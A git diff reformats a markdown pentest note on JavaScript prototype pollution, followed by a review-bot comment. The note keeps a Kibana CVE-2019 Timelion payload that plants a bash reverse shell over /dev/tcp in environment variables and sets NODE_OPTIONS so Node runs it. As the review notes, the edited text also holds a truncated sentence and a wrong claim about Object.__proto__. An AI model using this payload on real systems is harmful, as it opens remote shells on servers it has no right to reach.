diff --git a/Exploits/Web/Prototype Pollution JS.md b/Exploits/Web/Prototype Pollution JS.md index d12f7b7..d2e9f07 100644 --- a/Exploits/Web/Prototype Pollution JS.md +++ b/Exploits/Web/Prototype Pollution JS.md @@ -1,31 +1,43 @@ # Prototype Pollution -* Overwrite built in properties, like constructor, toString of an object. -* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects. +Overwrite built in properties, like constructor, toString of an object. + +Any other instance inherits properties from `Object.__proto__`. toString() is +inherited by all objects. +That means if the `toString()` functions is overwritten it is changed in all +other objects as well. + ## Usage -* Access to prototype inside object, as an example Javascript + +Access to prototype can be gained inside an object, as an example + ```javascript obj.__proto__ Object.prototype ``` -* Create object + +Create an object + ```javascript let obj = {} ``` -* Create properties inside `__proto__`. + +Create properties inside `__proto__`. + ```javascript obj.__proto__.isAdmin = true ``` -### Start Node commands -* Use - * `require` - * `eval` - ### Kibana CVE 2019 -* Write reverse bash into variable + +A concrete example is a Kibana prototype pollution from CVE from 2019. Write +reverse bash into variables so they get +Therefore Use the following node functions + +* `require` +* `eval` + ```javascript .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp//4444 0>&1\'");//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ') ``` -
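Review bot: The sentence "Write reverse bash into variables so they get" in the Kibana section is cut off mid-thought, and the line that follows ("Therefore Use the following node functions") no longer connects to anything; either finish the sentence (what happens once the variables are set, i.e. that `NODE_OPTIONS` makes Node load `/proc/self/environ` as a module so the `require("child_process")` payload runs when a new process is spawned) or restore the original "Start Node commands" wording so `require`/`eval` are introduced before the payload. Two smaller points in the same hunk: the intro now states that instances "inherit properties from `Object.__proto__`", but the prototype all plain objects inherit from is `Object.prototype` (`__proto__` is the accessor on an instance, which is exactly what the `obj.__proto__` / `Object.prototype` snippet below it shows), so that line should read `Object.prototype`; and "A concrete example is a Kibana prototype pollution from CVE from 2019" should cite the actual CVE identifier rather than just the year. Also consider marking the empty host in `/dev/tcp//4444` as a placeholder (e.g. `ATTACKER_IP`) so a reader does not copy it verbatim, and fix "if the `toString()` functions is overwritten" to "function is".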